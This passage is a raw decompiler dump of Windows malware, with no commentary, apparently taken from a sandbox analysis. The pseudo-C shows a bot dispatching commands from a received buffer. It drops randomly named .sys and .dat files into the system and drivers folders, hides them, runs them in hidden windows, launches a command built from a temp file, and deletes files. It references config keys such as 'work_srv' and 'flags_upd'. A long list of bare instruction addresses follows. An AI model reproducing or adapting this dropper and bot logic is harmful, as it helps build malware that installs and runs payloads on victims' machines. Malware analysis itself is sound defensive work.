													_push( *0x4136b0);
												}
												goto L177;
											}
											__eflags = _t395 - 2;
											if(_t395 == 2) {
												_t479 = E0040DF4C(_t748,  *0x4136b0);
												__eflags = _t479;
												if(_t479 != 0) {
													E0040ED3B( &(( *0x4136b0)[4]), "work_srv", 8);
													_t483 =  *0x4136b0;
													_t811 = _t811 + 0xc;
													__eflags =  *_t483 - 1;
													if( *_t483 == 1) {
														_t485 = E0040EED1( &(_t483[4]), "work_srv");
														__eflags = _t485;
														if(_t485 == 0) {
															 *0x413680 = 0;
															 *0x413674 = 0;
															 *0x413678 = 0;
															 *0x41367c = 0;
															E0040C517();
															_v68 = 1;
														}
													}
												}
												continue;
											}
											__eflags = _t395 - 0xa;
											if(__eflags == 0) {
												E004031D0( *0x4136b0, _v52);
												L46:
												continue;
											}
											if(__eflags <= 0) {
												L156:
												_t763 = 0;
												__eflags = 0;
												do {
													_t488 =  *(_t763 + 0x413300);
													__eflags = _t488;
													if(_t488 == 0) {
														goto L165;
													}
													_t795 =  *(_t488 + 0x40);
													__eflags = _t795;
													if(_t795 == 0) {
														goto L165;
													}
													_t748 = 0;
													_t489 = _t488 + 0xc;
													__eflags = _t489;
													while(1) {
														_t705 =  *_t489;
														__eflags = _t705;
														if(_t705 == 0) {
															goto L165;
														}
														__eflags = _t705 - _v39;
														if(_t705 == _v39) {
															 *_t795(_v39,  *0x4136b0, _v52);
															_t811 = _t811 + 0xc;
															goto L165;
														}
														_t748 = _t748 + 1;
														_t489 = _t489 + 4;
														__eflags = _t748 - 0xa;
														if(_t748 < 0xa) {
															continue;
														}
														goto L165;
													}
													L165:
													_t763 = _t763 + 4;
													__eflags = _t763 - 0x80;
												} while (_t763 < 0x80);
												continue;
											}
											__eflags = _t395 - 0xc;
											if(_t395 <= 0xc) {
												_t796 =  *0x4136b0;
												_t764 = 0;
												_v60 = 0;
												_v8 = _t796;
												__eflags =  *_t796;
												if( *_t796 <= 0) {
													L57:
													_t491 = _t764;
													_t797 =  &(( *0x4136b0)[4 + _t491 * 8]);
													_t492 = _v52 + 4 + _t491 * 8;
													_t704 = _t797[0x124] + 0x128;
													_v8 = _t492;
													__eflags = _t797[0x124] + 0x128 - _t492;
													while(1) {
														_v12 = 0;
														if(__eflags > 0) {
															break;
														}
														__eflags = _v8;
														if(_v8 <= 0) {
															break;
														}
														__eflags =  *_t797 & 0x00000003;
														if(( *_t797 & 0x00000003) == 0) {
															L150:
															_t494 = _t797[0x124];
															_t704 = 0xfffffed8 - _t494;
															_v8 =  &(_v8[0xfffffffffffffed8]);
															_t797 =  &(_t797[_t494 + 0x128]);
															__eflags = _t797[0x124] + 0x128 - _v8;
															continue;
														} else {
															E0040EE2A(_t704,  &_v408, 0, 0x120);
															_t499 =  *_t797;
															_t811 = _t811 + 0xc;
															_t765 = 0;
															_t711 = 0x100;
															__eflags = _t499 & 0x00000f80;
															if((_t499 & 0x00000f80) == 0) {
																_t618 = _t499 | 0x00000100;
																__eflags = _t618;
																 *_t797 = _t618;
															}
															_t500 =  *_t797;
															__eflags = _t500 & 0x00000800;
															if((_t500 & 0x00000800) != 0) {
																_t616 = _t500 & 0xfffff7ff;
																 *_t797 = _t616;
																__eflags =  *0x41201e; // 0x0
																if(__eflags == 0) {
																	_t617 = _t616 | 0x00000200;
																	__eflags = _t617;
																} else {
																	_t617 = _t616 | _t711;
																}
																 *_t797 = _t617;
															}
															_t501 =  *_t797;
															__eflags = _t501;
															if(_t501 >= 0) {
																__eflags = _t711 & _t501;
																if((_t711 & _t501) == 0) {
																	__eflags = _t501 & 0x00000200;
																	if((_t501 & 0x00000200) == 0) {
																		__eflags = _t501 & 0x00000400;
																		if((_t501 & 0x00000400) == 0) {
																			goto L96;
																		}
																		GetSystemDirectoryA( &_v408, 0x100);
																		_t595 =  &_v408;
																		_t775 = _t595 + 1;
																		do {
																			_t723 =  *_t595;
																			_t595 = _t595 + 1;
																			__eflags = _t723;
																		} while (_t723 != 0);
																		_t596 = _t595 - _t775;
																		__eflags = _t596;
																		if(_t596 != 0) {
																			__eflags =  *((char*)(_t806 + _t596 - 0x195)) - 0x5c;
																			if( *((char*)(_t806 + _t596 - 0x195)) != 0x5c) {
																				 *((char*)(_t806 + _t596 - 0x194)) = 0x5c;
																			}
																		}
																		E0040EF1E( &_v408, "drivers\\");
																		_t776 =  &_v408;
																		_t141 = _t776 + 1; // 0x5d
																		_t711 = _t141;
																		do {
																			_t599 =  *_t776;
																			_t776 = _t776 + 1;
																			__eflags = _t599;
																		} while (_t599 != 0);
																		_t765 = _t776 - _t711;
																		__eflags = _t765;
																		goto L96;
																	}
																	GetSystemDirectoryA( &_v408, 0x100);
																	_t777 =  &_v408;
																	_t602 = _t777 + 1;
																	do {
																		_t711 =  *_t777;
																		_t777 = _t777 + 1;
																		__eflags = _t711;
																	} while (_t711 != 0);
																	_t765 = _t777 - _t602;
																	__eflags = _t765;
																	goto L83;
																} else {
																	GetEnvironmentVariableA(E00402544(0x4122f8, 0x410a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																	E0040EE2A(_t711, 0x4122f8, 0, 0x100);
																	_t607 =  &_v408;
																	_t811 = _t811 + 0x20;
																	_t779 = _t607 + 1;
																	do {
																		_t711 =  *_t607;
																		_t607 = _t607 + 1;
																		__eflags = _t711;
																	} while (_t711 != 0);
																	_t765 = _t607 - _t779;
																	L83:
																	__eflags = _t765;
																	if(_t765 == 0) {
																		goto L96;
																	}
																	__eflags =  *((char*)(_t806 + _t765 - 0x195)) - 0x5c;
																	goto L85;
																}
															} else {
																_t780 =  &(_t797[4]);
																_t609 =  &(_t797[4]);
																_t726 =  &(_t609[1]);
																goto L69;
																do {
																	L71:
																	_t711 =  *_t613;
																	_t613 = _t613 + 1;
																	__eflags = _t711;
																} while (_t711 != 0);
																_t765 = _t613 - _t781;
																__eflags = _t765;
																if(_t765 == 0) {
																	L96:
																	__eflags =  *_t797 & 0x00000004;
																	if(( *_t797 & 0x00000004) == 0) {
																		_t502 =  &(_t797[0x104]);
																		L106:
																		_push(_t502);
																		L107:
																		lstrcatA( &_v408, ??);
																		L108:
																		__eflags =  *_t797 & 0x00000040;
																		if(( *_t797 & 0x00000040) != 0) {
																			E00408E26(_t711, _t748, 0x22c808, 0, 0, 0, 0,  &_v56);
																			_t811 = _t811 + 0x18;
																		}
																		__eflags = _v39 - 0xc;
																		if(_v39 == 0xc) {
																			_t583 = E0040EE95( &_v408, ".dat");
																			_pop(_t711);
																			__eflags = _t583;
																			if(_t583 != 0) {
																				SetFileAttributesA( &_v408, 0x80);
																			}
																		}
																		_t766 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																		__eflags = _t766 - 0xffffffff;
																		if(_t766 == 0xffffffff) {
																			E0040EE2A(_t711,  &_v408, 0, 0x120);
																			GetEnvironmentVariableA(E00402544("PromptOnSecureDesktop", 0x410a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																			E0040EE2A(_t711, "PromptOnSecureDesktop", 0, 0x100);
																			_t513 =  &_v408;
																			_t811 = _t811 + 0x2c;
																			_t768 = _t513 + 1;
																			do {
																				_t712 =  *_t513;
																				_t513 = _t513 + 1;
																				__eflags = _t712;
																			} while (_t712 != 0);
																			_t514 = _t513 - _t768;
																			__eflags = _t514;
																			if(_t514 != 0) {
																				__eflags =  *((char*)(_t806 + _t514 - 0x195)) - 0x5c;
																				if( *((char*)(_t806 + _t514 - 0x195)) != 0x5c) {
																					 *((char*)(_t806 + _t514 - 0x194)) = 0x5c;
																				}
																			}
																			lstrcatA( &_v408,  &(_t797[0x104]));
																			__eflags = _v39 - 0xc;
																			if(_v39 == 0xc) {
																				_t545 = E0040EE95( &_v408, ".dat");
																				_pop(_t712);
																				__eflags = _t545;
																				if(_t545 != 0) {
																					SetFileAttributesA( &_v408, 0x80);
																				}
																			}
																			_t769 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																			__eflags = _t769 - 0xffffffff;
																			if(_t769 != 0xffffffff) {
																				WriteFile(_t769,  &(_t797[0x128]), _t797[0x124],  &_v56, 0);
																				CloseHandle(_t769);
																				__eflags = _v39 - 0xc;
																				if(_v39 == 0xc) {
																					_t541 = E0040EE95( &_v408, ".dat");
																					_pop(_t712);
																					__eflags = _t541;
																					if(_t541 != 0) {
																						SetFileAttributesA( &_v408, 2);
																					}
																				}
																				_v12 = 1;
																			}
																			goto L143;
																		} else {
																			WriteFile(_t766,  &(_t797[0x128]), _t797[0x124],  &_v56, 0);
																			CloseHandle(_t766);
																			__eflags = _v39 - 0xc;
																			if(_v39 == 0xc) {
																				_t579 = E0040EE95( &_v408, ".dat");
																				__eflags = _t579;
																				if(_t579 != 0) {
																					SetFileAttributesA( &_v408, 2);
																				}
																			}
																			_v12 = 1;
																			_t552 = E0040EE95( &_v408, ".dat");
																			_pop(_t712);
																			__eflags = _t552;
																			if(_t552 == 0) {
																				L143:
																				__eflags =  *_t797 & 0x00000040;
																				if(( *_t797 & 0x00000040) != 0) {
																					E00408E26(_t712, _t748, 0x22c80c, 0, 0, 0, 0,  &_v56);
																					_t811 = _t811 + 0x18;
																				}
																				__eflags =  *_t797 & 0x00000002;
																				if(( *_t797 & 0x00000002) != 0) {
																					__eflags = _v12;
																					if(__eflags != 0) {
																						E00407EAD(_t748, __eflags, 1);
																						E00407FCF(_t712);
																						_t770 = 0x44;
																						E0040EE2A(_t712,  &_v876, 0, _t770);
																						_t811 = _t811 + 0x10;
																						_v876.cb = _t770;
																						_t527 = CreateProcessA( &_v408, 0x410264, 0, 0, 0, 0x8000000, 0, 0,  &_v876,  &_v424);
																						__eflags = _t527;
																						if(_t527 == 0) {
																							E00407EE6(_t712);
																							E00407EAD(_t748, __eflags, 0);
																							DeleteFileA( &_v408);
																						} else {
																							CloseHandle(_v424.hThread);
																							CloseHandle(_v424);
																						}
																					}
																				}
																				goto L150;
																			} else {
																				E0040EE2A(_t712,  &_v408, 0, 0x120);
																				GetEnvironmentVariableA(E00402544("PromptOnSecureDesktop", 0x410a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																				E0040EE2A(_t712, "PromptOnSecureDesktop", 0, 0x100);
																				_t559 =  &_v408;
																				_t811 = _t811 + 0x2c;
																				_t773 = _t559 + 1;
																				do {
																					_t712 =  *_t559;
																					_t559 = _t559 + 1;
																					__eflags = _t712;
																				} while (_t712 != 0);
																				_t560 = _t559 - _t773;
																				__eflags = _t560;
																				if(_t560 != 0) {
																					__eflags =  *((char*)(_t806 + _t560 - 0x195)) - 0x5c;
																					if( *((char*)(_t806 + _t560 - 0x195)) != 0x5c) {
																						 *((char*)(_t806 + _t560 - 0x194)) = 0x5c;
																					}
																				}
																				lstrcatA( &_v408,  &(_t797[0x104]));
																				__eflags = _v39 - 0xc;
																				if(_v39 == 0xc) {
																					_t575 = E0040EE95( &_v408, ".dat");
																					_pop(_t712);
																					__eflags = _t575;
																					if(_t575 != 0) {
																						SetFileAttributesA( &_v408, 0x80);
																					}
																				}
																				_t774 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																				__eflags = _t774 - 0xffffffff;
																				if(_t774 != 0xffffffff) {
																					WriteFile(_t774,  &(_t797[0x128]), _t797[0x124],  &_v56, 0);
																					CloseHandle(_t774);
																					__eflags = _v39 - 0xc;
																					if(_v39 == 0xc) {
																						_t571 = E0040EE95( &_v408, ".dat");
																						_pop(_t712);
																						__eflags = _t571;
																						if(_t571 != 0) {
																							SetFileAttributesA( &_v408, 2);
																						}
																					}
																				}
																				goto L143;
																			}
																		}
																	}
																	_t588 = E0040ECA5();
																	_t711 = 5;
																	_t748 = _t588 % _t711 + 3;
																	__eflags = _t748;
																	_v17 = _t748;
																	if(_t748 == 0) {
																		L99:
																		 *(_t806 + _t765 - 0x194) = 0;
																		_t590 =  *_t797;
																		__eflags = _t590 & 0x0000000a;
																		if((_t590 & 0x0000000a) != 0) {
																			_t502 = E00402544("PromptOnSecureDesktop", 0x410694, 5, 0xe4, 0xc8);
																			_t811 = _t811 + 0x14;
																			goto L106;
																		}
																		__eflags = _t590 & 0x00000010;
																		if((_t590 & 0x00000010) == 0) {
																			__eflags = _t590 & 0x00000020;
																			if((_t590 & 0x00000020) == 0) {
																				goto L108;
																			}
																			_push(".dat");
																			goto L107;
																		}
																		_push(".sys");
																		goto L107;
																	} else {
																		goto L98;
																	}
																	do {
																		L98:
																		_t591 = E0040ECA5();
																		_t711 = 0x19;
																		_t748 = _t591 % _t711 + 0x61;
																		 *(_t806 + _t765 - 0x194) = _t748;
																		_t765 = _t765 + 1;
																		_t155 =  &_v17;
																		 *_t155 = _v17 - 1;
																		__eflags =  *_t155;
																	} while ( *_t155 != 0);
																	goto L99;
																}
																_t615 =  *((intOrPtr*)(_t806 + _t765 - 0x195));
																__eflags = _t615 - 0x5c;
																if(_t615 != 0x5c) {
																	__eflags = _t615 - 0x2f;
																	L85:
																	if(__eflags != 0) {
																		 *(_t806 + _t765 - 0x194) = 0x5c;
																		_t765 = _t765 + 1;
																	}
																}
																goto L96;
																L69:
																_t748 =  *_t609;
																_t609 =  &(_t609[1]);
																__eflags = _t748;
																if(_t748 != 0) {
																	goto L69;
																} else {
																	__eflags = _t609 - _t726;
																	E0040EE08( &_v408, _t780, _t609 - _t726);
																	_t613 =  &_v408;
																	_t811 = _t811 + 0xc;
																	_t781 = _t613 + 1;
																	goto L71;
																}
															}
														}
													}
													__eflags =  *0x41211c & 0x00000004;
													if(( *0x41211c & 0x00000004) == 0) {
														continue;
													}
													__eflags = _v60;
													if(_v60 == 0) {
														continue;
													}
													__eflags =  *0x41201d; // 0x0
													if(__eflags == 0) {
														continue;
													}
													__imp__#3(_v16);
													Sleep(0x3e8);
													E0040E318();
													ExitProcess(0);
												} else {
													_t798 =  &(_t796[8]);
													__eflags = _t798;
													do {
														_t621 =  *(_t798 - 4);
														__eflags = _t621;
														if(_t621 == 0) {
															_v60 = 1;
															 *0x412138 =  *_t798;
														} else {
															_t624 = _t621 - 1;
															__eflags = _t624;
															if(_t624 == 0) {
																E0040EA84(1, "localcfg", "lid_file_upd",  *_t798);
																_t811 = _t811 + 0x10;
																 *0x41213c =  *_t798;
															} else {
																__eflags = _t624 == 1;
																if(_t624 == 1) {
																	E0040EA84(1, "localcfg", "flags_upd",  *_t798);
																	_t811 = _t811 + 0x10;
																	 *0x41211c =  *0x41211c |  *_t798;
																}
															}
														}
														_t764 = _t764 + 1;
														_t798 =  &(_t798[2]);
														__eflags = _t764 -  *_v8;
													} while (_t764 <  *_v8);
													goto L57;
												}
											}
											__eflags = _t395 - 0x1b;
											if(_t395 != 0x1b) {
												goto L156;
											}
											__eflags = _v52 - 0xc;
											if(_v52 <= 0xc) {
												_t630 =  *0x4136b0;
												 *0x4121a4 = _t630[4];
												 *0x4122d4 = _t630[8];
												_t632 = E0040F04E(0);
												asm("adc edx, ebx");
												 *0x4136a8 = _t632 + 0xe10;
												 *0x4136ac = _t748;
												continue;
											}
											_t634 = E00407E2F(_t748);
											__eflags = _t634;
											if(_t634 != 0) {
												continue;
											}
											_v12 =  *0x4136b0;
											__eflags =  *0x4121a8; // 0x0
											if(__eflags == 0) {
												L45:
												_t636 = _v12;
												 *0x4121a4 =  *(_t636 + 4);
												 *0x4122d4 =  *(_t636 + 8);
												E00407EAD(_t748, __eflags, 0);
												goto L46;
											} else {
												GetTempPathA(0x120,  &_v408);
												_t642 = E00408274( &_v408);
												_pop(_t709);
												_t782 = _t642;
												_t801 = (E0040ECA5() & 0x00000003) + 5;
												goto L38;
												L38:
												__eflags = _t801;
												if(_t801 > 0) {
													_t644 = E0040ECA5();
													_t709 = 0x1a;
													_t748 = _t644 % _t709 + 0x61;
													 *(_t806 + _t782 - 0x194) = _t748;
													_t782 = _t782 + 1;
													_t801 = _t801 - 1;
													__eflags = _t801;
													goto L38;
												} else {
													E0040EF00(_t806 + _t782 - 0x194, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
													E0040EE2A(_t709, 0x4122f8, 0, 0x100);
													_t811 = _t811 + 0x28;
													_t651 = CreateFileA( &_v408, 0x40000000, 0, 0, 2, 0, 0);
													_v8 = _t651;
													__eflags = _t651 - 0xffffffff;
													if(__eflags != 0) {
														_t657 = WriteFile(_v8,  &(_v12[0xc]), _v52 + 0xfffffff4,  &_v100, 0);
														_push(_v8);
														__eflags = _t657;
														if(__eflags == 0) {
															CloseHandle();
														} else {
															CloseHandle();
															_push(0x4121a8);
															_push( &_v408);
															wsprintfA( &_v1176, E00402544(0x4122f8, 0x410fe4, 0xc, 0xe4, 0xc8));
															E0040EE2A(_t709, 0x4122f8, 0, 0x100);
															_t803 = 0x44;
															E0040EE2A(_t709,  &_v808, 0, 0x4122f8);
															_v808.cb = _t803;
															E0040EE2A(_t709,  &_v120, 0, 0x10);
															_t811 = _t811 + 0x48;
															E00407FCF(_t709);
															_t673 = CreateProcessA(0,  &_v1176, 0, 0, 0, 0x8000000, 0, 0,  &_v808,  &_v120);
															__eflags = _t673;
															if(_t673 != 0) {
																WaitForSingleObject(_v120.hProcess, 0xea60);
																CloseHandle(_v120.hThread);
																CloseHandle(_v120);
																_t681 = E0040F04E(0) + 0xe10;
																__eflags = _t681;
																asm("adc edx, ebx");
																_pop(_t709);
																 *0x4136a8 = _t681;
																 *0x4136ac = _t748;
															}
															E00407EE6(_t709);
															DeleteFileA( &_v408);
														}
													}
													goto L45;
												}
											}
										}
										L228:
										__imp__#3(_v16);
										E0040E318();
										return _v68;
									} else {
										__imp__#3(_v16);
										goto L21;
									}
								}
								L15:
								__imp__#3(_v16);
							}
							return E0040C8AA(_t829);
						} else {
							_t805 =  *0x413670;
							while(_v12 < _t805) {
								asm("cdq");
								_t747 = (_t747 + 1) % _t805;
								 *0x41367c =  *0x41367c + 1;
								_v12 =  &(_v12[1]);
								 *0x413674 = _t747;
								if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) == 0) {
									continue;
								}
								goto L11;
							}
							goto L11;
						}
					}
					_t686 = E0040EBCC(0x100000);
					 *0x4136b0 = _t686;
					if(_t686 == 0) {
						goto L21;
					}
					goto L7;
				}
			}











































































































































































                                                                                0x0040c921
                                                                                0x0040c924
                                                                                0x0040c92d
                                                                                0x0040c937
                                                                                0x0040c937
                                                                                0x0040c942
                                                                                0x0040cb69
                                                                                0x0040cb69
                                                                                0x00000000
                                                                                0x0040c954
                                                                                0x0040c973
                                                                                0x0040c986
                                                                                0x0040c98b
                                                                                0x0040c990
                                                                                0x0040c993
                                                                                0x0040c99e
                                                                                0x0040c9b8
                                                                                0x0040c9b8
                                                                                0x0040c9be
                                                                                0x0040c9c9
                                                                                0x0040c9d0
                                                                                0x0040c9fd
                                                                                0x0040c9fd
                                                                                0x0040ca00
                                                                                0x0040ca03
                                                                                0x0040ca08
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ca18
                                                                                0x0040ca1f
                                                                                0x0040ca22
                                                                                0x0040ca24
                                                                                0x0040ca3f
                                                                                0x0040ca44
                                                                                0x0040ca47
                                                                                0x0040ca49
                                                                                0x0040ca5e
                                                                                0x0040ca63
                                                                                0x0040ca6e
                                                                                0x0040ca6f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ca71
                                                                                0x0040ca78
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ca7a
                                                                                0x0040ca81
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ca95
                                                                                0x0040ca9b
                                                                                0x0040caa1
                                                                                0x0040caa7
                                                                                0x0040cab8
                                                                                0x0040cac2
                                                                                0x0040cac5
                                                                                0x0040cad4
                                                                                0x0040cae7
                                                                                0x0040caf7
                                                                                0x0040cb09
                                                                                0x0040cb27
                                                                                0x0040cb2d
                                                                                0x0040cb37
                                                                                0x0040cb3d
                                                                                0x0040cb47
                                                                                0x0040cb4d
                                                                                0x0040cb54
                                                                                0x0040cb59
                                                                                0x0040cb5c
                                                                                0x0040cb5e
                                                                                0x0040cb70
                                                                                0x0040cb76
                                                                                0x0040cb7c
                                                                                0x0040cb7c
                                                                                0x0040cb7c
                                                                                0x0040cb9e
                                                                                0x0040cba3
                                                                                0x0040cba6
                                                                                0x0040cba9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cbaf
                                                                                0x0040cbb1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cbb3
                                                                                0x0040cbb6
                                                                                0x0040cbb8
                                                                                0x0040daea
                                                                                0x0040daea
                                                                                0x0040daeb
                                                                                0x0040daf0
                                                                                0x0040daf2
                                                                                0x0040daf5
                                                                                0x0040daf7
                                                                                0x0040dafd
                                                                                0x0040daff
                                                                                0x0040db02
                                                                                0x0040db0b
                                                                                0x0040db1b
                                                                                0x0040db20
                                                                                0x0040db20
                                                                                0x0040db02
                                                                                0x0040dafd
                                                                                0x0040db23
                                                                                0x0040db24
                                                                                0x0040db24
                                                                                0x00000000
                                                                                0x0040db29
                                                                                0x0040cbbe
                                                                                0x0040cbc1
                                                                                0x0040d662
                                                                                0x0040d667
                                                                                0x0040d669
                                                                                0x0040d66c
                                                                                0x0040d66f
                                                                                0x0040d672
                                                                                0x0040d675
                                                                                0x0040d6c7
                                                                                0x0040d6c7
                                                                                0x0040d6cb
                                                                                0x0040d707
                                                                                0x0040d707
                                                                                0x0040d70b
                                                                                0x0040d754
                                                                                0x0040d754
                                                                                0x0040d758
                                                                                0x0040d79e
                                                                                0x0040d79e
                                                                                0x0040d7a2
                                                                                0x0040d8b3
                                                                                0x0040d8b3
                                                                                0x0040d8ba
                                                                                0x0040d93a
                                                                                0x0040d93a
                                                                                0x0040d941
                                                                                0x0040da0e
                                                                                0x0040da0e
                                                                                0x0040da11
                                                                                0x0040da11
                                                                                0x0040da14
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040da1d
                                                                                0x0040da1d
                                                                                0x0040da23
                                                                                0x0040da25
                                                                                0x0040da90
                                                                                0x0040da90
                                                                                0x0040da94
                                                                                0x0040da9b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040daa1
                                                                                0x0040daa4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040dabf
                                                                                0x0040dac2
                                                                                0x0040dac7
                                                                                0x0040daca
                                                                                0x0040dacc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040dacc
                                                                                0x0040da27
                                                                                0x0040da2a
                                                                                0x0040da2c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040da42
                                                                                0x0040da7d
                                                                                0x0040da7d
                                                                                0x0040da80
                                                                                0x0040da83
                                                                                0x0040da85
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040da5f
                                                                                0x0040da64
                                                                                0x0040da67
                                                                                0x0040da69
                                                                                0x0040da89
                                                                                0x00000000
                                                                                0x0040da89
                                                                                0x0040da7a
                                                                                0x0040da7a
                                                                                0x00000000
                                                                                0x0040da87
                                                                                0x00000000
                                                                                0x0040da11
                                                                                0x0040d947
                                                                                0x0040d94c
                                                                                0x0040d94e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d955
                                                                                0x0040d95b
                                                                                0x0040d961
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d967
                                                                                0x0040d975
                                                                                0x0040d975
                                                                                0x0040d97b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d981
                                                                                0x0040d987
                                                                                0x0040d9c9
                                                                                0x0040d9c9
                                                                                0x0040d9ce
                                                                                0x0040d9d0
                                                                                0x0040d9d6
                                                                                0x0040d9d9
                                                                                0x0040d9df
                                                                                0x0040d9f7
                                                                                0x0040d9fe
                                                                                0x0040da03
                                                                                0x0040da06
                                                                                0x0040da08
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040da08
                                                                                0x0040d998
                                                                                0x0040d99a
                                                                                0x0040d99d
                                                                                0x0040d99f
                                                                                0x0040d9ab
                                                                                0x0040d9b4
                                                                                0x0040d9b9
                                                                                0x0040d9be
                                                                                0x0040d9be
                                                                                0x0040d9c1
                                                                                0x0040d9c7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d9c7
                                                                                0x0040d969
                                                                                0x0040d96f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d96f
                                                                                0x0040d8da
                                                                                0x0040d8df
                                                                                0x0040d8e4
                                                                                0x0040d8e7
                                                                                0x0040d8ea
                                                                                0x0040d8ea
                                                                                0x0040d8ec
                                                                                0x0040d8ed
                                                                                0x0040d8ed
                                                                                0x0040d8f1
                                                                                0x0040d8f3
                                                                                0x0040d8f6
                                                                                0x0040d8f8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d903
                                                                                0x0040d918
                                                                                0x0040d92a
                                                                                0x0040d92f
                                                                                0x0040d932
                                                                                0x0040d934
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d934
                                                                                0x0040d7a8
                                                                                0x0040d7aa
                                                                                0x0040d7b0
                                                                                0x0040d7be
                                                                                0x0040d7c3
                                                                                0x0040d7cf
                                                                                0x0040d7d6
                                                                                0x0040d7e1
                                                                                0x0040d7e2
                                                                                0x0040d7e2
                                                                                0x0040d7e5
                                                                                0x0040d7ed
                                                                                0x0040d7ee
                                                                                0x0040d7f4
                                                                                0x0040d81f
                                                                                0x0040d825
                                                                                0x0040d828
                                                                                0x0040d828
                                                                                0x0040d82a
                                                                                0x0040d830
                                                                                0x0040d832
                                                                                0x0040d85b
                                                                                0x0040d85b
                                                                                0x0040d85d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d878
                                                                                0x0040d87f
                                                                                0x0040d884
                                                                                0x0040d887
                                                                                0x0040d889
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d88f
                                                                                0x0040d895
                                                                                0x0040d897
                                                                                0x0040d897
                                                                                0x0040d89d
                                                                                0x0040d8a2
                                                                                0x0040d8a4
                                                                                0x0040d8a7
                                                                                0x0040d8ad
                                                                                0x0040d8ad
                                                                                0x00000000
                                                                                0x0040d834
                                                                                0x0040d834
                                                                                0x0040d836
                                                                                0x0040d836
                                                                                0x0040d839
                                                                                0x0040d839
                                                                                0x0040d83b
                                                                                0x0040d83c
                                                                                0x0040d83c
                                                                                0x0040d842
                                                                                0x0040d850
                                                                                0x0040d855
                                                                                0x0040d858
                                                                                0x0040d858
                                                                                0x00000000
                                                                                0x0040d858
                                                                                0x0040d832
                                                                                0x0040d783
                                                                                0x0040d792
                                                                                0x0040d797
                                                                                0x0040d79a
                                                                                0x0040d79c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d773
                                                                                0x0040d778
                                                                                0x0040d77b
                                                                                0x0040d77d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d77d
                                                                                0x00000000
                                                                                0x0040d783
                                                                                0x0040d70d
                                                                                0x0040d712
                                                                                0x0040d718
                                                                                0x0040d71f
                                                                                0x0040d721
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d73d
                                                                                0x0040d744
                                                                                0x0040d749
                                                                                0x0040d74c
                                                                                0x0040d74e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d74e
                                                                                0x0040d6d3
                                                                                0x0040d6f0
                                                                                0x0040d6f7
                                                                                0x0040d6fc
                                                                                0x0040d6ff
                                                                                0x0040d701
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d701
                                                                                0x0040d67a
                                                                                0x0040d67b
                                                                                0x0040d67c
                                                                                0x0040d6bb
                                                                                0x0040d6bb
                                                                                0x0040d6c0
                                                                                0x0040d6c3
                                                                                0x0040d6c5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d67f
                                                                                0x0040d696
                                                                                0x0040d69d
                                                                                0x0040d6a2
                                                                                0x0040d6a5
                                                                                0x0040d6a7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d6b0
                                                                                0x0040d6b0
                                                                                0x0040d6b3
                                                                                0x0040d6b4
                                                                                0x0040d6b5
                                                                                0x0040d6b5
                                                                                0x00000000
                                                                                0x0040d6bb
                                                                                0x0040cbc7
                                                                                0x0040cbca
                                                                                0x0040d5f2
                                                                                0x0040d5f8
                                                                                0x0040d5fa
                                                                                0x0040d611
                                                                                0x0040d616
                                                                                0x0040d61e
                                                                                0x0040d621
                                                                                0x0040d623
                                                                                0x0040d62e
                                                                                0x0040d635
                                                                                0x0040d637
                                                                                0x0040d63d
                                                                                0x0040d643
                                                                                0x0040d649
                                                                                0x0040d64f
                                                                                0x0040d655
                                                                                0x0040d65a
                                                                                0x0040d65a
                                                                                0x0040d637
                                                                                0x0040d623
                                                                                0x00000000
                                                                                0x0040d5fa
                                                                                0x0040cbd0
                                                                                0x0040cbd3
                                                                                0x0040d5e1
                                                                                0x0040cdec
                                                                                0x00000000
                                                                                0x0040cdec
                                                                                0x0040cbd9
                                                                                0x0040d589
                                                                                0x0040d589
                                                                                0x0040d589
                                                                                0x0040d58b
                                                                                0x0040d58b
                                                                                0x0040d591
                                                                                0x0040d593
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d595
                                                                                0x0040d598
                                                                                0x0040d59a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d59c
                                                                                0x0040d59e
                                                                                0x0040d59e
                                                                                0x0040d5a1
                                                                                0x0040d5a1
                                                                                0x0040d5a3
                                                                                0x0040d5a5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d5a7
                                                                                0x0040d5aa
                                                                                0x0040d5c3
                                                                                0x0040d5c5
